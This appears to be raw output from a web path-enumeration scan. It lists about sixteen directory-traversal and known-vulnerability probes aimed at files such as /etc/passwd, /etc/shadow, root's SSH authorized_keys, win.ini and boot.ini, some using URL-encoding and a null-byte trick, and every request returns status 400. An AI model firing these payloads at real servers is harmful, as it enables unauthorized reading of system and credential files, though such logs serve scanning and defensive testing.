/%2e%2e//google.com   (Status: 400) [Size: 915]
/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pagecache.php (Status: 400) [Size: 915]
/rashtml5gateway//..\\\..\\\..\\\..\\\..\\\windows\win.ini (Status: 400) [Size: 0]
/my_keys&dst=../../../root/.ssh/authorized_keys (Status: 400) [Size: 915]
/votes/../../admin/multiuser/multiuser.php (Status: 400) [Size: 915]
/signezui/playlist/edit/upload/../../../../../../../../../../etc/passwd (Status: 400) [Size: 915]
//jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd (Status: 400) [Size: 915]
//./../../../../../../../../../../etc/shadow (Status: 400) [Size: 915]
//css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ (Status: 400) [Size: 915]
//js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 915]
//xyz/../../ThinVnc.ini (Status: 400) [Size: 915]
//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini (Status: 400) [Size: 0]
//../agc/bp.pl        (Status: 400) [Size: 915]
